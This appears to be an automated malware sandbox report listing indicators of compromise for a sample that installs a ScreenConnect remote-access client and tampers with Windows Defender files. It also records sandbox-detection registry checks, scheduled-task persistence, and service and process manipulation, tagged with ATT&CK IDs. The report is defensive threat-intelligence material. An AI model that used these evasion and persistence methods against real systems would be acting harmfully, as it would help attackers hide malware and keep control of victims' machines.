File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\system.config	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Client.dll	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Core.dll	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.Override.en-US.resources	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\ThinksMartin	TbV75ZR.exe
File created	C:\Windows\Installer\e57f82b.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\FinancingPortable	TbV75ZR.exe
File opened for modification	C:\Windows\SinghCooling	WLbfHbp.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\Installer\MSIF9E2.tmp	msiexec.exe
File opened for modification	C:\Windows\VeryBulk	TbV75ZR.exe
File opened for modification	C:\Windows\DollStriking	TbV75ZR.exe
File opened for modification	C:\Windows\VeryBulk	WLbfHbp.exe
File opened for modification	C:\Windows\MandateFlashing	WLbfHbp.exe
File opened for modification	C:\Windows\DollStriking	WLbfHbp.exe
File opened for modification	C:\Windows\VeryBulk	TbV75ZR.exe
File opened for modification	C:\Windows\ThoseTransit	WLbfHbp.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\IstRepresentative	WLbfHbp.exe
File opened for modification	C:\Windows\AdministratorNhs	TbV75ZR.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\e57f82d.msi	msiexec.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\MandateFlashing	TbV75ZR.exe
File opened for modification	C:\Windows\AdministratorNhs	WLbfHbp.exe
File created	C:\Windows\Tasks\rapes.job	df504a29ad522d6eabe6258886d296bc.exe
File opened for modification	C:\Windows\FinancingPortable	TbV75ZR.exe
File opened for modification	C:\Windows\IstRepresentative	TbV75ZR.exe
File opened for modification	C:\Windows\IstRepresentative	WLbfHbp.exe
File opened for modification	C:\Windows\Installer\e57f82b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\ThinksMartin	WLbfHbp.exe
File opened for modification	C:\Windows\SinghCooling	WLbfHbp.exe
File opened for modification	C:\Windows\SinghCooling	TbV75ZR.exe
File opened for modification	C:\Windows\Installer\MSIFBD7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\DollStriking	TbV75ZR.exe
File opened for modification	C:\Windows\Installer\MSIF9B2.tmp	msiexec.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\IstRepresentative	TbV75ZR.exe
File opened for modification	C:\Windows\ThoseTransit	TbV75ZR.exe
File opened for modification	C:\Windows\MandateFlashing	WLbfHbp.exe
File opened for modification	C:\Windows\FinancingPortable	WLbfHbp.exe
File created	C:\Windows\Installer\wix{F2D9E338-36BD-B769-CD92-1C2995F4239A}.SchedServiceConfig.rmi	MsiExec.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\AdministratorNhs	WLbfHbp.exe
File created	C:\Windows\Installer\SourceHash{F2D9E338-36BD-B769-CD92-1C2995F4239A}	msiexec.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\ThinksMartin	TbV75ZR.exe
File opened for modification	C:\Windows\MandateFlashing	TbV75ZR.exe
File opened for modification	C:\Windows\ThoseTransit	TbV75ZR.exe
File opened for modification	C:\Windows\SinghCooling	TbV75ZR.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\FinancingPortable	WLbfHbp.exe
File opened for modification	C:\Windows\ThoseTransit	WLbfHbp.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\AdministratorNhs	TbV75ZR.exe
File created	C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\VeryBulk	WLbfHbp.exe
File opened for modification	C:\Windows\ThinksMartin	WLbfHbp.exe
File opened for modification	C:\Windows\DollStriking	WLbfHbp.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5140	sc.exe
3624	sc.exe
1080	sc.exe
3020	sc.exe
640	sc.exe
5436	sc.exe
5548	sc.exe
1944	sc.exe
5836	sc.exe
1492	sc.exe
1744	sc.exe
5164	sc.exe
5460	sc.exe
3612	sc.exe
3648	sc.exe
5788	sc.exe
2032	sc.exe
2476	sc.exe
5212	sc.exe
2796	sc.exe
3308	sc.exe
6036	sc.exe
2644	sc.exe
1304	sc.exe
460	sc.exe
1892	sc.exe
4984	sc.exe
764	sc.exe
4596	sc.exe
3088	sc.exe
4260	sc.exe
1116	sc.exe
220	sc.exe
2080	sc.exe
1496	sc.exe
652	sc.exe
4360	sc.exe
760	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2564	652	WerFault.exe	109
2644	2380	WerFault.exe	239

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WLbfHbp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	df504a29ad522d6eabe6258886d296bc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6850b4c5cd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BIm18E9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	65f4920f26.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	65f4920f26.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TbV75ZR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f5cf9bfc02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	da26fd5ce6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tool.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	785956b81d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BIm18E9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d88b6fe64d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	79cfa38bf5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TbV75ZR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000005c00d8281e7515450000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800005c00d8280000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809005c00d828000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d5c00d828000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000005c00d82800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	6850b4c5cd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6850b4c5cd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
4668	timeout.exe
2820	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
8796	taskkill.exe
9008	taskkill.exe
9164	taskkill.exe
9308	taskkill.exe
8140	taskkill.exe

Modifies data under HKEY_USERS 13 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe

Modifies registry class 38 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\PackageCode = "833E9D2FDB63967BDC29C192594F32A9"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\URL Protocol	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductIcon = "C:\\Windows\\Installer\\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\\DefaultIcon"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Version = "402915332"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9\Full	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings	firefox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\UseOriginalUrlEncoding = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\ = "ScreenConnect Client (f63a82ffaf9f93d1) Credential Provider"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductName = "ScreenConnect Client (f63a82ffaf9f93d1)"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media\1 = ";"	msiexec.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
552	schtasks.exe
1628	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1376	df504a29ad522d6eabe6258886d296bc.exe
